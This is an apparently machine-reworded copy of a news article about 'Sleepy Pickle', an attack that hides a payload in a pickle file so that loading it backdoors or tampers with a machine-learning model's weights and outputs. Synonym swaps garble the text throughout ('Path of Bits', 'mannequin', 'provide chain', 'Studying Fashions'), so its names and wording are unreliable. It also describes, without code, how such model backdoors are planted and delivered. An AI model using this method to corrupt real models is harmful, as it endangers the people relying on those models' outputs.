New Assault Approach ‘Sleepy Pickle’ Targets Machine Studying Fashions

Jun 13, 2024NewsroomVulnerability / Software program Safety

The safety dangers posed by the Pickle format have as soon as once more come to the fore with the invention of a brand new “hybrid machine learning (ML) model exploitation technique” dubbed Sleepy Pickle.

The assault technique, per Path of Bits, weaponizes the ever present format used to bundle and distribute machine studying (ML) fashions to deprave the mannequin itself, posing a extreme provide chain danger to a company’s downstream clients.

“Sleepy Pickle is a stealthy and novel attack technique that targets the ML model itself rather than the underlying system,” safety researcher Boyan Milanov stated.

Cybersecurity

Whereas pickle is a extensively used serialization format by ML libraries like PyTorch, it may be used to perform arbitrary code execution assaults just by loading a pickle file (i.e., throughout deserialization).

“We suggest loading models from users and organizations you trust, relying on signed commits, and/or loading models from [TensorFlow] or Jax formats with the from_tf=True auto-conversion mechanism,” Hugging Face factors out in its documentation.

Sleepy Pickle works by inserting a payload right into a pickle file utilizing open-source instruments like Fickling, after which delivering it to a goal host through the use of one of many 4 methods corresponding to an adversary-in-the-middle (AitM) assault, phishing, provide chain compromise, or the exploitation of a system weak point.

Machine Learning

“When the file is deserialized on the victim’s system, the payload is executed and modifies the contained model in-place to insert backdoors, control outputs, or tamper with processed data before returning it to the user,” Milanov stated.

Put in a different way, the payload injected into the pickle file containing the serialized ML mannequin might be abused to change mannequin habits by tampering with the mannequin weights, or tampering with the enter and output knowledge processed by the mannequin.

In a hypothetical assault situation, the method could possibly be used to generate dangerous outputs or misinformation that may have disastrous penalties to consumer security (e.g., drink bleach to treatment flu), steal consumer knowledge when sure circumstances are met, and assault customers not directly by producing manipulated summaries of stories articles with hyperlinks pointing to a phishing web page.

Cybersecurity

Path of Bits stated that Sleepy Pickle might be weaponized by risk actors to take care of surreptitious entry on ML programs in a way that evades detection, on condition that the mannequin is compromised when the pickle file is loaded within the Python course of.

That is additionally simpler than immediately importing a malicious mannequin to Hugging Face, as it will possibly modify mannequin habits or output dynamically with out having to entice their targets into downloading and working them.

“With Sleepy Pickle attackers can create pickle files that aren’t ML models but can still corrupt local models if loaded together,” Milanov stated. “The attack surface is thus much broader, because control over any pickle file in the supply chain of the target organization is enough to attack their models.”

“Sleepy Pickle demonstrates that advanced model-level attacks can exploit lower-level supply chain weaknesses via the connections between underlying software components and the final application.”

Discovered this text attention-grabbing? Comply with us on Twitter and LinkedIn to learn extra unique content material we submit.

Recent articles